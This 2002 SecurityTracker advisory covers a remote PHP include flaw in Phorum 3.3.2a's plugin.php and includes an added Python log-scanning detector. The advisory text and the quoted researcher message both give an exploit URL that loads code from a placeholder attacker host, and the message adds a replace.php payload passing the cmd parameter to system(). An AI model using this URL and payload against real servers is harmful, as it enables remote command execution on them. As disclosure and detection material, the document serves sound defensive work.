SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Phorum
Vendors:   Phorum.org
Phorum Bulletin Board Software PHP Include Bug in 'plugin.php' Lets Remote Users Execute Arbitrary PHP Code and Shell Commands on the Server
SecurityTracker Alert ID:  1004323
SecurityTracker URL:  http://securitytracker.com/id/1004323
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 17 2002
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.3.2a
Description:   A vulnerability was reported in the Phorum bulletin board software. A remote user can cause the server to include a PHP script of the user's choosing and thereby execute arbitrary PHP code and shell commands on the server.

The vulnerability reportedly resides in the './plugin/replace/plugin.php' script. The script uses an include statement that allows a remote user to specify an include file located on a remote server:

include("$PHORUM[settings_dir]/replace.php");

So, the remote user can use the following type of URL to cause the server to execute a command (in this case, the 'ls' directory listing command):

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

With this request, the target host will retrieve the file http://[evilhost]/replace.php and execute it.
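
A defender's check for this request pattern, as an added example (not part of the advisory or of Phorum's code): it scans web access-log lines for query parameters that try to set the PHORUM array and marks those whose value is a URL. The log lines, addresses and the host files.example are constructed, and the function names are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Request field of a common/combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names that address the PHORUM array (PHP variable names are case-sensitive).
PHORUM_PARAM_RE = re.compile(r"^PHORUM(\[|$)")
# Values that begin with a URL scheme ("http://", "ftp://") or a bare "//host".
REMOTE_VALUE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/May/2002:10:00:01 +0000] "GET /phorum/list.php?f=1 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [17/May/2002:10:02:13 +0000] "GET /phorum/plugin/replace/plugin.php'
    '?PHORUM[settings_dir]=http://files.example&cmd=ls HTTP/1.0" 200 312',
    '198.51.100.7 - - [17/May/2002:10:02:40 +0000] "GET /phorum/plugin/replace/plugin.php'
    '?PHORUM%5Bsettings_dir%5D=http%3A%2F%2Ffiles.example HTTP/1.1" 200 312',
    '203.0.113.5 - - [17/May/2002:10:05:09 +0000] "GET /phorum/plugin/replace/plugin.php'
    '?PHORUM[settings_dir]=/tmp HTTP/1.1" 200 0',
]


def classify_request(target):
    """Return 'remote-include', 'global-override' or None for one request target."""
    query = target.partition("?")[2].partition("#")[0]
    verdict = None
    # parse_qsl percent-decodes names and values, so encoded brackets are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not PHORUM_PARAM_RE.match(name):
            continue
        if REMOTE_VALUE_RE.match(value):
            return "remote-include"   # value points the include at another host
        verdict = "global-override"   # request tries to set PHORUM[...] at all
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every suspicious request in the log."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        verdict = classify_request(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Access logs record only the request line, so parameters carried in a POST body are not visible to this check.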

Impact:   A remote user can execute arbitrary PHP code and shell commands on the system.
Solution:   The vendor has released a fixed version (3.3.2b3), available at:

http://www.phorum.org/

Vendor URL:  www.phorum.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  Phorum 3.3.2a remote command execution


Target:
Phorum 3.3.2a (prior versions?)

Description:
In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
include external php scripts and execute arbitrary code.

Found by:
Markus Arndt<markus-arndt@web.de>

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
I just snooped around a bit and found this file vulnerable to remote script inclusion:

./plugin/replace/plugin.php

Let's see some code:



	<?php
	include("$PHORUM[settings_dir]/replace.php");

	function mod_replace_read_body ($body) {
	  global $pluginreplace;
	  reset($pluginreplace);
	  while(list($key,$val) = each($pluginreplace)) {
	    $body = str_replace($key,$val,$body);
	  }
	  return $body;
	}

	$plugins["read_body"]["mod_replace"]="mod_replace_read_body";

	?>


Easy one..

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it.
If [evilhost] has php enabled we could use this one as replace.php:

	<?
	echo("<?
	system(\"\$cmd\");
	?>");
	?>

If it's not php-enabled simply:
	<?
	system("$cmd");
	?>




Markus Arndt<markus-arndt@web.de>
http://skka.de